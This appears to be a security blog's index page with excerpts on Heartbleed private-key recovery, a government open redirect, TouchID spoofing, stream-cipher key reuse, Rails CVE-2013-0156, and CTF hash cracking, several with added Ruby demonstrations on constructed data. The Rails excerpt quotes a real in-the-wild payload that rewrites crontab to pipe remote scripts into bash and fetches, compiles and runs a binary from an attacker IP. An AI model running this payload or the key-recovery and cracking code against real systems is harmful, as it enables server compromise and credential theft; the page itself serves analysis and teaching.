Heartbleeding Private Keys via Metasploit

I’ve resisted posting about Heartbleed, just because I don’t think there’s much more to be said, so I’ll keep this brief. By now you know that it allows for reading raw server memory, including things like credentials, session tokens, and whatever else happens to be in the web server process’s memory near where your request was allocated. That also includes the keys that secure SSL/TLS sessions, up to and including the server’s private key.

Thanks, at least in part, to Cloudflare’s challenge, a number of people have shown that RSA private keys can be recovered with enough attempts and a little math: a leaked prime factor of the modulus is enough to rebuild the rest of the key.

So what makes my successful attack different? I did it with a Metasploit module.
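A recovery routine in the spirit of the Cloudflare challenge solutions, written here as an added Ruby example (it is not the Metasploit module and not anyone’s challenge code): it slides a window over a leaked blob, tries each window as a divisor of the public modulus, and once a prime falls out rebuilds the private exponent. The 1024-bit key, the planted 64 KiB “leak” and the byte-order handling are constructed for the demonstration; a real leak arrives as up to 64 KB per heartbeat response, and a 2048-bit key means 128-byte windows.

```ruby
require 'openssl'

# Scan a leaked memory blob for a window that divides the public modulus n.
# OpenSSL stores BIGNUM limbs least-significant word first, so on x86 the
# prime sits little-endian in memory; both byte orders are tried per window.
# Returns the factor as an OpenSSL::BN, or nil if no window divides n.
def find_factor(leak, n, width)
  one = OpenSSL::BN.new(1)
  (0..(leak.bytesize - width)).each do |offset|
    window = leak.byteslice(offset, width)
    [window, window.reverse].each do |bytes|
      candidate = OpenSSL::BN.new(bytes, 2)      # bytes read as a big-endian integer
      next unless candidate.odd?                  # RSA primes are odd; cheap early skip
      next if candidate <= one || candidate >= n
      return candidate if (n % candidate).zero?
    end
  end
  nil
end

# Given n, e and one prime p, recover q and the private exponent d.
def derive_private_exponent(n, e, p)
  q, _remainder = n / p                # OpenSSL::BN#/ returns [quotient, remainder]
  phi = (p - 1) * (q - 1)
  e.mod_inverse(phi)
end

# Sanity check without building a key object: (m^e)^d must equal m mod n.
def private_exponent_valid?(n, e, d)
  m = OpenSSL::BN.new(0x4242)
  m.mod_exp(e, n).mod_exp(d, n) == m
end

# Constructed scenario: a fresh 1024-bit key (small so the scan is quick; real keys
# are 2048 bits or more) and a fake 64 KiB heartbeat response with the little-endian
# bytes of p planted among random filler.
KEY = OpenSSL::PKey::RSA.new(1024)
PRIME_WIDTH = KEY.p.num_bytes
LEAK = begin
  rng = Random.new(2014)
  rng.bytes(20_000) + KEY.p.to_s(2).reverse + rng.bytes(65_536 - 20_000 - PRIME_WIDTH)
end

# Full pipeline: find a factor in the leak, then derive d for the matching public key.
def recover_key_from_leak(leak = LEAK, key = KEY)
  p = find_factor(leak, key.n, key.p.num_bytes)
  return nil unless p
  derive_private_exponent(key.n, key.e, p)
end

if $PROGRAM_NAME == __FILE__
  d = recover_key_from_leak
  puts d ? "recovered d; round trip ok: #{private_exponent_valid?(KEY.n, KEY.e, d)}" : 'no factor found'
end
```

The only thing the attacker needs from the server is the public certificate, which gives n and e; every 64 KB response is then a haystack to test window by window. Trying both byte orders matters because the limb layout, not the DER encoding, is what sits in the heap.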

Open Redirect in benefits.gov for Eight Years

While digging into some old phishing campaigns, I came across something interesting. It’s nothing earth-shattering, but the sheer length of time this vulnerability has remained viable, even after being identified in the press as actively exploited in the wild, is noteworthy.

You see, nearly eight years after being abused in a phishing campaign, the vulnerability is still present.

Hack My iPhone’s TouchID @ Derbycon - Win $100

Just like the title says, if you’re the first to hack my iPhone 5s’ TouchID during Derbycon, I’ll give you $100.

The IsTouchIDHackedYet bounty has recently been claimed by Starbug of the Chaos Computer Club, and the corresponding video shows the technique. They used a scanner to create an image of a fingerprint lifted from the iPhone’s touchscreen, made a dummy fingerprint out of wood glue, and used that dummy print to authenticate to TouchID. Marc Rogers and others have reproduced the technique. So everything is laid bare, right?

Not quite.

OTP, Stream Ciphers, and Key Reuse

During (and just prior to) DEF CON, |)ruid ran a series of challenges for entrance into his LOLBitcoin party. I decided to give them a shot, and thought I’d document my approach to one of the challenges here.

There were several different paths available, so that anyone could approach the challenges using whatever skills they felt were their strongest. I decided to go down ‘The Way of the Cryptologist’ and was met with a few challenges put together by Dan Crowley.

It’s the second of these which I’m describing here. Dan himself beat me to the punch with a solid writeup of his own, and a tool which he released to attack the challenge, and similarly flawed uses of crypto.
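The flaw the challenge turns on, keystream reuse, as an added Ruby example for this post (not Dan’s tool or the challenge code): two messages XORed with the same keystream leave the keystream cancelled out, so c1 XOR c2 equals p1 XOR p2, and a guessed fragment of one message can be dragged across that XOR to read fragments of the other. The two messages and the keystream below are constructed sample data.

```ruby
# XOR two byte strings of equal length.
def xor_bytes(a, b)
  raise ArgumentError, 'length mismatch' unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

# A stream cipher (or OTP) is just XOR with a keystream; reuse is the only flaw modelled here.
def stream_cipher(plaintext, keystream)
  xor_bytes(plaintext, keystream.byteslice(0, plaintext.bytesize))
end

# Two ciphertexts under one keystream XOR to the XOR of their plaintexts: the key cancels.
def plaintext_xor(c1, c2)
  xor_bytes(c1, c2)
end

# Crib dragging: slide a guessed fragment of one plaintext across p1 XOR p2. Wherever
# the result is all printable ASCII, the crib plausibly sits at that offset and the
# output is the corresponding fragment of the other message.
def crib_drag(xored, crib)
  hits = []
  (0..(xored.bytesize - crib.bytesize)).each do |offset|
    fragment = xor_bytes(xored.byteslice(offset, crib.bytesize), crib)
    hits << [offset, fragment] if fragment.match?(/\A[ -~]+\z/)
  end
  hits
end

# Once one plaintext is fully known (or recovered crib by crib), the keystream falls
# out and every other message encrypted under it decrypts.
def recover_other_plaintext(c1, c2, known_p1)
  keystream = xor_bytes(c1, known_p1)
  xor_bytes(c2, keystream)
end

# Constructed sample: two equal-length messages and one random keystream used twice.
P1 = 'attack at dawn on the east ridge'
P2 = 'retreat at dusk to the west camp'
KEYSTREAM = Random.new(0xC0FFEE).bytes(P1.bytesize)
C1 = stream_cipher(P1, KEYSTREAM)
C2 = stream_cipher(P2, KEYSTREAM)

if $PROGRAM_NAME == __FILE__
  xored = plaintext_xor(C1, C2)
  crib_drag(xored, ' the ').each { |off, frag| puts "offset #{off}: #{frag.inspect}" }
  puts recover_other_plaintext(C1, C2, P1)
end
```

The printable-ASCII filter is crude but effective on English: most wrong offsets produce control characters or high bytes and drop out, and each good hit extends the known text so the next crib is longer.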

RoR CVE-2013-0156 in the Wild

Ruby on Rails CVE-2013-0156 has recently been exploited in the wild. This vulnerability was the subject of much discussion, and an emergency RoR advisory, back in January. It’s pretty surprising that it’s taken this long to surface in the wild, but less surprising that people are still running vulnerable installations of Rails. It also appears to have affected some web hosts.

Exploit activity is reportedly sourcing from:

  • 88.198.20.247
  • 95.138.186.181
  • 188.190.126.105

The payload consists of the following:

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k
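The mechanism behind CVE-2013-0156, shown as an added Ruby example rather than Rails code: the XML parameter parser typecast each `<element type="...">` through a table of converters, and until the January fix that table still included `yaml` (and `symbol`), so a request body could hand arbitrary YAML to the deserializer and have the server instantiate whatever class it named. The regex “parser”, the `Gadget` class and the request body below are constructed stand-ins; the real exploit targeted classes inside Rails itself.

```ruby
require 'yaml'

# Psych 4 (Ruby 3.1+) made YAML.load safe; the old behaviour lives on as unsafe_load.
def unsafe_yaml_load(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

# Toy stand-in for the per-type conversion table applied to <element type="t">value</element>.
# This is the shape the table took after the fix: only harmless scalar conversions remain.
FIXED_PARSING = {
  'integer' => ->(v) { v.to_i },
  'boolean' => ->(v) { %w[1 true].include?(v.strip) },
  'string'  => ->(v) { v },
}.freeze

# Before the fix the table also let the request body pick these two converters.
VULNERABLE_PARSING = FIXED_PARSING.merge(
  'symbol' => ->(v) { v.to_sym },               # unbounded symbol creation (memory exhaustion)
  'yaml'   => ->(v) { unsafe_yaml_load(v) },    # full object deserialization from the body
).freeze

# Minimal parser for flat <root><name type="t">value</name></root> bodies. A regex is a
# stand-in for the real XML parser; the typecasting step is the part that matters here.
def parse_params(body, parsing)
  pattern = %r{<(\w+)(?:\s+type="(\w+)")?>([^<]*)</\1>}m
  body.scan(pattern).each_with_object({}) do |(name, type, value), params|
    caster = parsing[type] || parsing['string']   # unknown or missing type: kept as a string
    params[name] = caster.call(value)
  end
end

# Hypothetical class standing in for whatever an attacker would target. The point is only
# that the request names the class and the server allocates it and fills its ivars.
class Gadget
  attr_reader :cmd
end

# Constructed request body in the shape the exploit used: an element carrying type="yaml".
BODY = <<~XML
  <request>
    <name type="string">alice</name>
    <age type="integer">42</age>
    <data type="yaml">--- !ruby/object:Gadget
  cmd: id
  </data>
  </request>
XML

if $PROGRAM_NAME == __FILE__
  p parse_params(BODY, VULNERABLE_PARSING)['data']   # a Gadget instance built from the body
  p parse_params(BODY, FIXED_PARSING)['data']        # the same text, left as a String
end
```

With the vulnerable table the `data` element comes back as a live `Gadget` object whose `cmd` was set by the client; with the fixed table it is an inert string. Nothing else about the request changed, which is why the advisory’s mitigation (dropping the `yaml` and `symbol` typecasts, or disabling the XML parameter parser outright) was enough to close the hole.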

Follow Up: BSJTF Packet Analysis Challenge

Recently, I posted a blog about a CTF challenge I participated in that involved some packet analysis. Since then, I’ve had a chance to chat with @dth0m who wrote that challenge.

He had some very interesting things to say, which I thought warranted another entry.

If you haven’t read the previous post about this challenge, you might want to read that first.

BSJTF CTF Writeup - on the Rogue Agents Tail

This is a guest post, mostly, from @drbearsec. I say mostly, because I’m formatting his words somewhat. I did not take part in this challenge, so the solve is totally the work of him and his crack CTF team (currently in 2nd place overall, and gaining). The team is made up of @drbearsec, @essobi, @Babs0matic, and @j0hnnyxm4s.

For this challenge, teams were given a series of password hashes. Cracking them would yield the key.
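The basic approach to a challenge like this, as an added Ruby example (not the team’s solve): guess the algorithm from the digest length, run a wordlist through a few mangling rules, and hash each candidate until the targets fall. The hashes here are constructed from known plaintexts so the example is self-checking; in the CTF you would paste in the hex strings you were handed.

```ruby
require 'digest'

# Unsalted algorithms a hex digest of a given length could be.
DIGEST_BY_HEX_LENGTH = {
  32 => [Digest::MD5],
  40 => [Digest::SHA1],
  64 => [Digest::SHA256],
}.freeze

# Cheap mangling rules: case variants, a trailing digit, a bang, a year.
def mangle(word)
  base = [word, word.capitalize, word.upcase].uniq
  base + base.flat_map { |w| (0..9).map { |d| "#{w}#{d}" } + ["#{w}!", "#{w}2013"] }
end

# Dictionary attack: returns {hex_hash => plaintext} for every target that cracked.
def crack(hashes, wordlist)
  targets = hashes.map(&:downcase)
  found = {}
  wordlist.each do |word|
    mangle(word).each do |candidate|
      targets.each do |target|
        next if found.key?(target)
        algorithms = DIGEST_BY_HEX_LENGTH.fetch(target.length, [])
        found[target] = candidate if algorithms.any? { |alg| alg.hexdigest(candidate) == target }
      end
    end
    break if found.size == targets.size
  end
  found
end

# Constructed targets (one per algorithm) and a tiny themed wordlist.
SAMPLE_HASHES = [
  Digest::MD5.hexdigest('Zeus2013'),
  Digest::SHA1.hexdigest('athena!'),
  Digest::SHA256.hexdigest('hermes7'),
].freeze
WORDLIST = %w[apollo zeus athena hermes hades].freeze

if $PROGRAM_NAME == __FILE__
  crack(SAMPLE_HASHES, WORDLIST).each { |h, pw| puts "#{h}  #{pw}" }
end
```

Length alone cannot distinguish, say, MD5 from NTLM or SHA-256 from SHA3-256, so when the first guess yields nothing, widen the algorithm list before widening the wordlist.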

BSJTF CTF Writeup - What in the Name of Zeus?

Recently, I’ve been participating in some of the BSides Joint Task Force CTF challenges. This CTF is being put on by the organizers of the recent BSides Chicago and upcoming BSides Detroit. They’re spanning both conferences, and also releasing challenges online in between.

I thought I’d do a write up of one of these challenges, since it’s both a fun exercise and the way I solved it makes a good introduction to Ruby. If you’ve never used Ruby, I encourage you to give it a try. It’s a powerful language, and I find its syntax to be extremely intuitive. Of course, there are a number of ways to solve this challenge.

I’ll try to outline not only my path to solving this, but also some failed ideas, in the hopes that they’ll shed some light on my thought process.

Thanks to the BSJTF and especially to @dth0m for putting this challenge together.

Hello World

I decided to try and get back on the blogging bandwagon. This will be where that happens.

I found my previous attempts encumbered by heavier blogging platforms that required a little more effort to work with. This left me putting off various posts until eventually they just didn’t happen at all. For this attempt, I’m trying Octopress. So far, I’m happy with it.

Octopress has a number of features that I like over other platforms I’ve tried in the past:

  • Static content generation (Less attack surface)
  • Markdown formatting for posts
  • Rake integration for creating posts, pages, etc.
  • Github Pages support
  • Git workflow for pushing updates, etc.

In short, it’s lighter weight and fits better with tools I already use frequently. This should make it less burdensome and thus lead to more posts from me. Or at least, that’s the plan.